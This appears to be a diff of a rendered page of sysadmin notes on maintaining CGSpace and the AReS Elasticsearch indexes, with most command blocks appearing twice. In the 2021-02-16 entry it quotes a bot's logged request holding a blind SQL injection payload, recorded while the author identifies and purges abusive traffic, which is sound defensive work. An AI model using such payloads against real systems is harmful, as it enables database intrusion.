</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real 247m30.850s
</span></span><span style="display:flex;"><span>user 160m36.657s
</span></span><span style="display:flex;"><span>sys 2m26.050s
</span></span></code></pre></div><ul>
<li>Regarding the CG Core v2 migration, Fabio wrote to tell me that he is not using CGSpace directly, instead harvesting via GARDIAN
<ul>
<li>He gave me the contact of Sotiris Konstantinidis, who is the CTO at SCIO Systems and works on the GARDIAN platform</li>
@ -385,30 +385,30 @@ sys 2m26.050s
</li>
<li>Delete the old Elasticsearch temp index to prepare for starting an AReS re-harvest:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
# start indexing in AReS
</code></pre></div><h2 id="2021-02-08">2021-02-08</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span># start indexing in AReS
</span></span></code></pre></div><h2 id="2021-02-08">2021-02-08</h2>
<ul>
<li>Finish rotating the AReS indexes after the harvesting last night:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 100983,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;:true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-08
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-02-08&#39;</span>
</code></pre></div><h2 id="2021-02-10">2021-02-10</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 100983,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;:true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-08
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-02-08&#39;</span>
</span></span></code></pre></div><h2 id="2021-02-10">2021-02-10</h2>
<ul>
<li>Talk to Abdullah from CodeObia about a few of the issues we filed on OpenRXV
<ul>
@ -429,22 +429,22 @@ $ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-i
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> | wc -l
30354
$ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> | sort -u | wc -l
18555
$ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> | sort | uniq -c | sort -h | tail
5 c21a79e5-e24e-4861-aa07-e06703d1deb7
5 c2460aa1-ae28-4003-9a99-2d7c5cd7fd38
5 d73fb3ae-9fac-4f7e-990f-e394f344246c
5 dc0e24fa-b7f5-437e-ac09-e15c0704be00
5 dc50bcca-0abf-473f-8770-69d5ab95cc33
5 e714bdf9-cc0f-4d9a-a808-d572e25c9238
6 7dfd1c61-9e8c-4677-8d41-e1c4b11d867d
6 fb76888c-03ae-4d53-b27d-87d7ca91371a
6 ff42d1e6-c489-492c-a40a-803cabd901ed
7 094e9e1d-09ff-40ca-a6b9-eca580936147
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> | wc -l
</span></span><span style="display:flex;"><span>30354
</span></span><span style="display:flex;"><span>$ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> | sort -u | wc -l
</span></span><span style="display:flex;"><span>18555
</span></span><span style="display:flex;"><span>$ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> | sort | uniq -c | sort -h | tail
</span></span><span style="display:flex;"><span> 5 c21a79e5-e24e-4861-aa07-e06703d1deb7
</span></span><span style="display:flex;"><span> 5 c2460aa1-ae28-4003-9a99-2d7c5cd7fd38
</span></span><span style="display:flex;"><span> 5 d73fb3ae-9fac-4f7e-990f-e394f344246c
</span></span><span style="display:flex;"><span> 5 dc0e24fa-b7f5-437e-ac09-e15c0704be00
</span></span><span style="display:flex;"><span> 5 dc50bcca-0abf-473f-8770-69d5ab95cc33
</span></span><span style="display:flex;"><span> 5 e714bdf9-cc0f-4d9a-a808-d572e25c9238
</span></span><span style="display:flex;"><span> 6 7dfd1c61-9e8c-4677-8d41-e1c4b11d867d
</span></span><span style="display:flex;"><span> 6 fb76888c-03ae-4d53-b27d-87d7ca91371a
</span></span><span style="display:flex;"><span> 6 ff42d1e6-c489-492c-a40a-803cabd901ed
</span></span><span style="display:flex;"><span> 7 094e9e1d-09ff-40ca-a6b9-eca580936147
</span></span></code></pre></div><ul>
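<li>A more direct way to count how many ids occur more than once is <code>uniq -d</code>, for example:</li>
</ul>
<pre tabindex="0"><code>$ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed '1d' | sort | uniq -d | wc -l
</code></pre>
<ul>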
<li>I added a comment to that bug to ask if this is a side effect of the patch</li>
<li>I started working on tagging pre-2010 ILRI items with license information, like we talked about with Peter and Abenet last week
<ul>
@ -452,23 +452,23 @@ $ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed <span style="color:#e6db74">&#39;1
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c <span style="color:#e6db74">&#39;id,dc.date.issued,dc.date.issued[],dc.date.issued[en_US],dc.rights,dc.rights[],dc.rights[en],dc.rights[en_US],dc.publisher,dc.publisher[],dc.publisher[en_US],dc.type[en_US]&#39;</span> /tmp/2021-02-10-ILRI.csv | csvgrep -c <span style="color:#e6db74">&#39;dc.type[en_US]&#39;</span> -r <span style="color:#e6db74">&#39;^.+[^(Journal Item|Journal Article|Book|Book Chapter)]&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;id,dc.date.issued,dc.date.issued[],dc.date.issued[en_US],dc.rights,dc.rights[],dc.rights[en],dc.rights[en_US],dc.publisher,dc.publisher[],dc.publisher[en_US],dc.type[en_US]&#39;</span> /tmp/2021-02-10-ILRI.csv | csvgrep -c <span style="color:#e6db74">&#39;dc.type[en_US]&#39;</span> -r <span style="color:#e6db74">&#39;^.+[^(Journal Item|Journal Article|Book|Book Chapter)]&#39;</span>
</span></span></code></pre></div><ul>
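<li>Note that the trailing <code>[^(&hellip;)]</code> in that pattern is a character class rather than a negated group, so the filter is looser than it looks; a stricter version would invert an exact match with csvgrep&rsquo;s <code>-i</code>, something like:</li>
</ul>
<pre tabindex="0"><code>$ csvgrep -c 'dc.type[en_US]' -i -r '^(Journal Item|Journal Article|Book|Book Chapter)$' /tmp/2021-02-10-ILRI.csv
</code></pre>
<ul>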
<li>I imported the CSV into OpenRefine and converted the date text values to date types so I could facet by dates before 2010:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">if(diff(value,&#34;01/01/2010&#34;.toDate(),&#34;days&#34;)&lt;0, true, false)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>if(diff(value,&#34;01/01/2010&#34;.toDate(),&#34;days&#34;)&lt;0, true, false)
</span></span></code></pre></div><ul>
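<li>The conversion itself is presumably just a GREL transform on the date column before faceting, something like:</li>
</ul>
<pre tabindex="0"><code>value.toDate()
</code></pre>
<ul>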
<li>Then I filtered by publisher to make sure they were only ours:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">or(
value.contains(&#34;International Livestock Research Institute&#34;),
value.contains(&#34;ILRI&#34;),
value.contains(&#34;International Livestock Centre for Africa&#34;),
value.contains(&#34;ILCA&#34;),
value.contains(&#34;ILRAD&#34;),
value.contains(&#34;International Laboratory for Research on Animal Diseases&#34;)
)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>or(
</span></span><span style="display:flex;"><span> value.contains(&#34;International Livestock Research Institute&#34;),
</span></span><span style="display:flex;"><span> value.contains(&#34;ILRI&#34;),
</span></span><span style="display:flex;"><span> value.contains(&#34;International Livestock Centre for Africa&#34;),
</span></span><span style="display:flex;"><span> value.contains(&#34;ILCA&#34;),
</span></span><span style="display:flex;"><span> value.contains(&#34;ILRAD&#34;),
</span></span><span style="display:flex;"><span> value.contains(&#34;International Laboratory for Research on Animal Diseases&#34;)
</span></span><span style="display:flex;"><span>)
</span></span></code></pre></div><ul>
<li>I tagged these pre-2010 items with &ldquo;Other&rdquo; if they didn&rsquo;t already have a license</li>
<li>I checked 2010 to 2015, and 2016 to date, but they were all tagged already!</li>
<li>In the end I added the &ldquo;Other&rdquo; license to 1,523 items from before 2010</li>
@ -496,7 +496,7 @@ $ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed <span style="color:#e6db74">&#39;1
en | 7601
| 0
(4 rows)
dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item);
dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id IN (SELECT uuid FROM item);
</code></pre><ul>
<li>Start a full Discovery re-indexing on CGSpace</li>
</ul>
@ -504,8 +504,8 @@ dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (S
<ul>
<li>Clear the OpenRXV temp items index:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span></code></pre></div><ul>
<li>Then start a full harvesting of CGSpace in the AReS Explorer admin dashboard</li>
<li>Peter asked me about a few other recently submitted FEAST items that are restricted
<ul>
@ -521,35 +521,35 @@ dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (S
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/move-metadata-values.py -i /tmp/move.txt -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f <span style="color:#ae81ff">43</span> -t <span style="color:#ae81ff">55</span>
</code></pre></div><h2 id="2021-02-15">2021-02-15</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/move-metadata-values.py -i /tmp/move.txt -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f <span style="color:#ae81ff">43</span> -t <span style="color:#ae81ff">55</span>
</span></span></code></pre></div><h2 id="2021-02-15">2021-02-15</h2>
<ul>
<li>Check the results of the AReS Harvesting from last night:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 101126,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 101126,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><ul>
<li>Set the current items index to read only and make a backup:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39; {&#34;settings&#34;: {&#34;index.blocks.write&#34;:true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-15
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39; {&#34;settings&#34;: {&#34;index.blocks.write&#34;:true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-15
</span></span></code></pre></div><ul>
<li>Delete the current items index and clone the temp one:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-02-15&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-02-15&#39;</span>
</span></span></code></pre></div><ul>
<li>Call with Abdullah from CodeObia to discuss community and collection statistics reporting</li>
</ul>
<h2 id="2021-02-16">2021-02-16</h2>
@ -563,49 +563,49 @@ $ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-i
</li>
<li>They are definitely bots posing as users, as I see they have created six thousand DSpace sessions today:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat dspace.log.2021-02-16 | grep -E <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=45.146.165.203&#39;</span> | sort | uniq | wc -l
4007
$ cat dspace.log.2021-02-16 | grep -E <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=130.255.161.231&#39;</span> | sort | uniq | wc -l
2128
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat dspace.log.2021-02-16 | grep -E <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=45.146.165.203&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>4007
</span></span><span style="display:flex;"><span>$ cat dspace.log.2021-02-16 | grep -E <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=130.255.161.231&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>2128
</span></span></code></pre></div><ul>
<li>Ah, actually 45.146.165.203 is making requests like this:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">&#34;http://cgspace.cgiar.org:80/bitstream/handle/10568/238/Res_report_no3.pdf;jsessionid=7311DD88B30EEF9A8F526FF89378C2C5%&#39; AND 4313=CONCAT(CHAR(113)+CHAR(98)+CHAR(106)+CHAR(112)+CHAR(113),(SELECT (CASE WHEN (4313=4313) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(98)+CHAR(112)+CHAR(113)) AND &#39;XzQO%&#39;=&#39;XzQO&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>&#34;http://cgspace.cgiar.org:80/bitstream/handle/10568/238/Res_report_no3.pdf;jsessionid=7311DD88B30EEF9A8F526FF89378C2C5%&#39; AND 4313=CONCAT(CHAR(113)+CHAR(98)+CHAR(106)+CHAR(112)+CHAR(113),(SELECT (CASE WHEN (4313=4313) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(98)+CHAR(112)+CHAR(113)) AND &#39;XzQO%&#39;=&#39;XzQO&#34;
</span></span></code></pre></div><ul>
<li>I purged the hits from these two using my <code>check-spider-ip-hits.sh</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
Purging 4005 hits from 45.146.165.203 in statistics
Purging 3493 hits from 130.255.161.231 in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 7498
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
</span></span><span style="display:flex;"><span>Purging 4005 hits from 45.146.165.203 in statistics
</span></span><span style="display:flex;"><span>Purging 3493 hits from 130.255.161.231 in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 7498
</span></span></code></pre></div><ul>
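<li>The <code>/tmp/ips</code> file is just a plain text list of the addresses to purge, one per line, in this case presumably:</li>
</ul>
<pre tabindex="0"><code>45.146.165.203
130.255.161.231
</code></pre>
<ul>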
<li>Ugh, I looked in Solr for the top IPs in 2021-01 and found a few more of these Russian IPs so I purged them too:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
Purging 27163 hits from 45.146.164.176 in statistics
Purging 19556 hits from 45.146.165.105 in statistics
Purging 15927 hits from 45.146.165.83 in statistics
Purging 8085 hits from 45.146.165.104 in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 70731
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
</span></span><span style="display:flex;"><span>Purging 27163 hits from 45.146.164.176 in statistics
</span></span><span style="display:flex;"><span>Purging 19556 hits from 45.146.165.105 in statistics
</span></span><span style="display:flex;"><span>Purging 15927 hits from 45.146.165.83 in statistics
</span></span><span style="display:flex;"><span>Purging 8085 hits from 45.146.165.104 in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 70731
</span></span></code></pre></div><ul>
<li>My god, and 64.39.99.15 belongs to Qualys, the security scanning company, whose requests are probing to see whether we are vulnerable (wtf?)
<ul>
<li>Looking in Solr I see a few different IPs with reverse DNS like <code>sn003.s02.iad01.qualys.com.</code>, so I will purge their requests too (spot check below):</li>
</ul>
</li>
</ul>
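<ul>
<li>For example, a reverse lookup on one of them (the PTR shown is illustrative, based on the hostnames I saw in Solr):</li>
</ul>
<pre tabindex="0"><code>$ host 64.39.99.15
15.99.39.64.in-addr.arpa domain name pointer sn003.s02.iad01.qualys.com.
</code></pre>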
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
Purging 3 hits from 130.255.161.231 in statistics
Purging 16773 hits from 64.39.99.15 in statistics
Purging 6976 hits from 64.39.99.13 in statistics
Purging 13 hits from 64.39.99.63 in statistics
Purging 12 hits from 64.39.99.65 in statistics
Purging 12 hits from 64.39.99.94 in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 23789
</code></pre></div><h2 id="2021-02-17">2021-02-17</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
</span></span><span style="display:flex;"><span>Purging 3 hits from 130.255.161.231 in statistics
</span></span><span style="display:flex;"><span>Purging 16773 hits from 64.39.99.15 in statistics
</span></span><span style="display:flex;"><span>Purging 6976 hits from 64.39.99.13 in statistics
</span></span><span style="display:flex;"><span>Purging 13 hits from 64.39.99.63 in statistics
</span></span><span style="display:flex;"><span>Purging 12 hits from 64.39.99.65 in statistics
</span></span><span style="display:flex;"><span>Purging 12 hits from 64.39.99.94 in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 23789
</span></span></code></pre></div><h2 id="2021-02-17">2021-02-17</h2>
<ul>
<li>I tested Node.js 10 vs 12 on CGSpace (linode18) and DSpace Test (linode26) and the build times were surprising
<ul>
@ -627,11 +627,11 @@ Purging 12 hits from 64.39.99.94 in statistics
<li>Abenet asked me to add Tom Randolph&rsquo;s ORCID identifier to CGSpace</li>
<li>I also tagged all his 247 existing items on CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat 2021-02-17-add-tom-orcid.csv
dc.contributor.author,cg.creator.id
&#34;Randolph, Thomas F.&#34;,&#34;Thomas Fitz Randolph: 0000-0003-1849-9877&#34;
$ ./ilri/add-orcid-identifiers-csv.py -i 2021-02-17-add-tom-orcid.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
</code></pre></div><h2 id="2021-02-20">2021-02-20</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2021-02-17-add-tom-orcid.csv
</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.id
</span></span><span style="display:flex;"><span>&#34;Randolph, Thomas F.&#34;,&#34;Thomas Fitz Randolph: 0000-0003-1849-9877&#34;
</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i 2021-02-17-add-tom-orcid.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
</span></span></code></pre></div><h2 id="2021-02-20">2021-02-20</h2>
<ul>
